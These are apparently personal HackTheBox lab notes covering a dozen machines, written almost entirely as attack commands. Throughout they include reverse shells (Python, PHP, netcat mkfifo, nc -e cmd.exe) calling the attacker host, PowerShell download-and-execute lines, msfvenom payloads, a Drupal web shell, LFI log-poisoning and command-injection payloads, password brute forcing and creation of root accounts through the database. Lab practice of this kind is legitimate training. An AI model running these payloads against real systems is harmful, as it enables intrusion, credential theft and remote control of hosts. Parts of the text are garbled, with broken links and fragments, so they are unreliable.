# Machines Practice #### Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :) ## Swagshop one way to get root file sudo /usr/bin/vi /var/www/html/../../../root/root.txt 2nd way www-data\@swagshop\:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell 3rd way sudo vi /var/www/html/a -c ':!/bin/sh' python magento\_rce.py '' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9001 >/tmp/f" \============================================================= ## Arkham ``` nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt 10.10.10.130 ``` ``` masscan -e tun0 -p1-65535,U:1-65535 10.10.10.130 --rate=700 ``` ``` smbmap -H 10.10.10.130 -u guest -R | tee smbmap.txt mount -t cifs -o rw,username=guest,uid=0,gid=0 //10.10.10.130/BatShare ``` \================================================================ ## Bastion ``` mount -t cifs //10.10.10.134/backups /mnt -o user=,password= find /mnt/ -type f guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2 ``` ``` secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7 ``` 05/10/2019 ## Bashed: echo "import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);s.connect((\\"10.10.14.10\\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\[\\"/bin/sh\\",\\"-i\\"]);" > exploit.py /dev/shm - writable directory sudo -u scriptmanager bash upload reverse shell if normal shell not working python -c 'import pty;pty.spawn("/bin/bash")' /usr/share/laudanum/php/php-reverse-shell.php \==================================================================== ## Nibbles: hydra -l admin -P rockyou.txt http-post-form "/nibbleblog/admin.php:username=^USER^\&password=^PASS^:Incorrect Username" - not working ip block cmd.php GIF8; find . | grep controllers ldd --version - cat /etc/lsb-release One solution to get root Create one file monitor.sh /bin/sh bash Other trick to get exploit for ubuntu version --------- Rational love exploit \=================================================== ## Blue - window machine Eternal blue : ms 17-010 nmap -p 445 --script safe -Pn -n ip \[nmap -p 445 --script "vuln and safe" -Pn -n ip] Eternal blue exploit manually : modify the python exploit and put location in our payload Exploit modification required add computer name in to host file and then scan smb servers smbclient -L \10.10.10.40 -N smbclient \\\haris-pc\Users python exploit.py ip ntsvcs \=========================================================================== ## Sense - Linux Machine - PFsense {% embed url="" %} manual cmd injection ``` /status_rrd_graph_img.php?database=queues;whoami|nc+ip+port ``` ``` /status_rrd_graph_img.php?database=queues;whoami|nc+ip+port|python ``` on attacker machine run this command nc -vnlp port < cmd In cmd we have this reverse shell code import socket,subprocess,os s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM) s.connect(("10.10.14.10",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(\["/bin/sh","-i"]) nc -lvnp 3456 exploit-db exploit {% embed url="" %} \===================================================== ## Optimum port 80 is opening httpfileserver tcpdump -i tun0 %00{.exec|ping 10.10.14.10.} use invoke-powershelltcp.ps1 C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.10 ctrl shift u - to decode C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('[http://ip:port/InvokePowerhsleltcp.ps1'](http://ip/:port/InvokePowerhsleltcp.ps1'%7D.%7D)).} sherlock script execute to get the false positive patches New-Object Net.WebClient}.downloadString('[http://ip:port/InvokePowerhsleltcp.ps1'](http://ip/:port/InvokePowerhsleltcp.ps1'%7D)) Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 1234 New-Object Net.WebClient}.downloadString('') Find-AllVulns cd /poweshell/Empire/data/module\_source/privesc/Invoke-MS16032 IEX(New-Object Net.WebClient).downloadString('') Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')" \==================================================== ## Node - Linux 3000- node sed 's/,/\n/g' notes - password extract api/users crack the hashes online and offline Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot online - hashes.org grep -Ri password . | less fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY\_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU" base64 -d myplace.backup >myplace {% embed url="';" %} privsec to tom user mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler find / -user root -perm -4000 -exec ls -ld {} \\; 2> /dev/null db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } ); find / -perm -4000 2>/dev/null /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd" /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /r**t/r**t.txt | base64 -d > root.zip command injection: /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')" \===================================================== ## Legacy - windows Samba Scan ``` nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4 ``` ``` First Exploit - ms08-67 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe python ms08-067.py 10.10.10.4 6 445 ``` ``` wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe ``` host file with smbserver ``` smbserver.py a /usr/share/windows-binaries/ ``` ``` \\10.10.14.14\a\whoami.exe ``` \=========================================================== ## Valentine heartbleed vulnerability python heartbleed.py -n 100 ip for i in ${seq 0 100}; do python heartbleed.py ip; done h[ttps://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py](https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py) then find hype.key (hex to ascii) ssh key and use this key and password get from heartbleed ssh -i hype.key hype\@ip check the history and check ps elf | grep root 2nd exploit {% embed url="" %} gcc -pthread dirty.c -o dirty -lcrypt su - \============================================== Fuzzy web app challenge‌ gobuster -u -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌ gobuster -u -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌ wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt ​‌ wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt ​‌ \====================================== HDC HackTheBox Web Challenge Walkthrough/Solution‌ so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()‌ credentials stored in js file doprocess function‌ find emails on secret folder then run bruteforce in to all emails and get the flag‌ \=======================================‌ Lernaean Web Challenge — HackTheBox‌ hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593‌ \========================================= CARTOGRAPHER‌ username= ’- and password= ‘ - sql injection‌ #### info=flag ‌ \[20 Points] Lernaean \[by Arrexel]‌ hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414‌ \=========================================== \[50 Points]‌ I know Mag1k \[by rkmylo]‌ padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"‌ padbuster 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\\"user\\":\\"qq\\",\\"role\\":\\"admin\\"}"[
](https://app.gitbook.com/@infosecsanyam-1/s/all-about-oscp-methodology/~/drafts/-LqeOHHDullNJrnPPzWY/primary/) \======================================================= ## Bastard - windows Drupal payload chnages $url = ''; $endpoint\_path = '/rest'; $endpoint = 'rest\_endpoint'; $phpcode = <<<'EOD' \" . $REQUEST\['fupload'])); }; if (isset($\_REQUEST\['fexec'])) { ``` echo "
" . shell_exec($_REQUEST['fexec']) . "
"; ``` }; ?> EOD; $file = \[ 'filename' => 'sam.php', 'data' => $ippsec ]; IEX(New-Object Net.WebClient).downloadString('') \\\10.10.14.10\sam\ms15-051x64.exe "\10.10.14.10\sam\nc64.exe -e cmd.exe 10.10.14.10 443" \[#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('') \10.10.14.10\a\ms15-051x64.exe "\10.10.14.10\a\nc64.exe -e cmd.exe 10.10.14.10 443" powershell iex(new-object net.webclient).downloadstring('') ``` curl http://10.10.10.9/0xdf.php?cmd=whoami http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443 ``` ``` powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1') ``` Shell with Nishang ``` python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')" ``` {% embed url="" %} ``` \\10.10.14.14\share\ms15-051x64.exe "whoami" \\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443" ``` \=================================================== Poison - machine is vulnerable to lfi add this shell in to user agent ``` User-Agent: 0xdf: ``` then check the logs \&c=id connectivity check ``` view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.14.6 tcpdump -i tun0 icmp ``` ``` view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=nc 10.10.14.6 8081 nc -lnvp 8081 ``` Shell as WWW Visit `view-source:`[`http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f`](http://10.10.10.84/browse.php?file=/var/log/httpd-access.log\&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f), Listening on localhost: ``` netstat -an -p tcp ps -auwwx | grep vnc ``` #### Tunneling / VNC connection ``` tail /etc/proxychains.conf ssh charix@10.10.10.84 -D 8081 proxychains vncviewer 127.0.0.1:5901 -passwd secret ``` Looking inside `/root/.vnc/`, there’s a `passwd` file that matches the file `secret`: ``` python /opt/vncpasswd.py/vncpasswd.py -d -f secret ``` LFi Filter :- php\://filter/convert.base64-encode/resource=index.php Request to add data in php variable which is visible on phpinfo. Content-Type: multipart/form-data; boundary=--PleaseSubscribe Content-Length: 166 ----PleaseSubscribe Content-Disposition: form-data; name="sam"; filename="Leaveacomment" Content-type:text/plain Please share my videos \==================================================== Brainfuck: python sshng2john.py id\_rsa > braingfuck-crack john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt wpscan –url –disable-tls-checks cp /usr/share/exploitdb/exploits/php/webapps/40939.txt . wordpress exploit -> smtp cred -> smtp cred to get secret forum password - > Encryption decryption {% embed url="" %} > ssh2john id\_rsa > id\_john > > john id\_john –wordlist=/usr/share/wordlists/rockyou.txt > In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large)[https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
](https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e)python -c “print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, ‘x’).decode(‘hex’)” 6efc1a5dbb8904751ce6566a305bb8ef > > [![](https://dev-redteamtutorials-wp.pantheonsite.io/wp-content/uploads/2018/11/johndecrypted.png)](https://dev-redteamtutorials-wp.pantheonsite.io/wp-content/uploads/2018/11/johndecrypted.png)================================================= grandparents (granny & grandpa granny & grandpa iptables -A OUTPUT -d 10.10.10.14 -j DROP davtest --url move options check move ippsec.html destination ippsec.aspx ms14-070 exploit work for root ms15-051 - not work curl -X PUT --data -binary @shell.aspx curl -X MOVE -H 'Destination: 5/shell.aspx' curl Reverse shell on metasploit check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14\_058\_track\_popup\_menu) post(multi/recon/local\_exploit\_suggester) Microsoft IIS WebDav ‘ScStoragePathFromUrl’ Remote Buffer Overflow grandpa: . Use **exploit/windows/iis/iis\_webdav\_scstoragepathfromurl**. As we can see below, set options.\ \&#xNAN;**<< use exploit/windows/iis/iis\_webdav\_scstoragepathfromurl>>**\ **<< options >>**\ **<< set RHOST 10.10.10.14>>**\ **<\ >>**\ **<\>** **<< use exploits/windows/local/ms15\_051\_client\_copy\_image >>**\ **<< options >>** **============================================** **Redcross** ``` wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400 gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20 ``` Xss payload in to contact us form ``
SQLi On submitting the UserID filter, I’m sent to [`https://intra.redcross.htb/?o=1&page=app`](https://intra.redcross.htb/?o=1\&page=app), where `o=` is the id filtered on. If I try with a `'` in there, [`https://intra.redcross.htb/?o=1'&page=app`](https://intra.redcross.htb/?o=1%27\&page=app): ``` sqlmap -r app.request --delay=1 --batch --dump sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs ``` ``` nmap -p- --min-rate 5000 10.10.10.113 ``` ``` python 41162.py -c "ping -c 1 10.10.14.14" -t penelope@redcross.htb -m 10.10.10.113 tcpdump -i tun0 -n icmp python 41162.py -c "php -r '\$sock=fsockopen(\"10.10.14.14\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t penelope@redcross.htb -m 10.10.10.113 ``` **Injection RCE** {% embed url="" %} Brup Suite RCE : ip=1;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF\_INET,socket.SOCK\_STREAM)%3bs.connect(("10.10.14.23",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(\["/bin/sh","-i"])%3b'\&action=deny #### Priv esc to penelope ``` s = smtplib.SMTP(mailserver,1025) ./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross ``` #### Priv esc to root ``` penelope@redcross:/etc$ psql -h 127.0.0.1 -U unixnss -W unix ``` ``` openssl passwd -1 0xdf ``` ``` insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope'); ``` #### Path 1: sudoers Group ``` insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope'); sudo su ``` #### Path 2: Via unixnssroot ``` unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root'); ``` **Find psql Configs** ``` ls -l nss-pgsql* cat nss-pgsql-root.conf psql -h 127.0.0.1 -U unixnssroot -p 5432 -d unix ``` This user can add a user with user id 0 (root): ``` insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root'); su r0xdfot ``` Using this account, we are able to create a new user with UID 0: ``` insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root'); ```